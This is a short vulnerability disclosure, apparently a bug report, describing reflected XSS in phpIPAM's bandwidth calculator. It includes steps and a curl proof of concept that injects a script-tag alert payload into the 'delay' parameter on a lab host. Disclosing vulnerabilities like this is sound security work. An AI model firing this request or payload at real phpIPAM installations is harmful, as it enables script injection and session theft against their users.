Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.
1. i open this page localhost/phpipam/index.php?page=tools§ion=ip-calculator&subnetId=bw-calculator
2. and i analysis code line 41-45 https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/bw-calculator-result.php
3. next i tried with burpsuite to intercept and then change the value of some parameters such as wsize, delay and fsize on line 13-15 https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/ bw-calculator-result.php with <script>alert(1)</script> payload
4. and i trigger payload xss reflected <script>alert(1)</script>
//PoC
curl -i -s -k -X $'POST' \
-H $'Host: 192.168.1.15' -H $'Content-Length: 54' -H $'Accept: */*' -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: http://192.168.1.15' -H $'Referer: http://192.168.1.15/phpipam/index.php?page=tools§ion=ip-calculator&subnetId=bw-calculator' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,id;q=0.8' -H $'Connection: close' \
-b $'sectionSubnets.bs.table.searchText=; table-page-size=50; phpipam=p4jub8nb4ou2a95kso4ed22aom' \
--data-binary $'wsize=50000&delay=<script>alert(1)</script>&fsize=1024' \
$'http://192.168.1.15/phpipam/app/tools/ip-calculator/bw-calculator-result.php'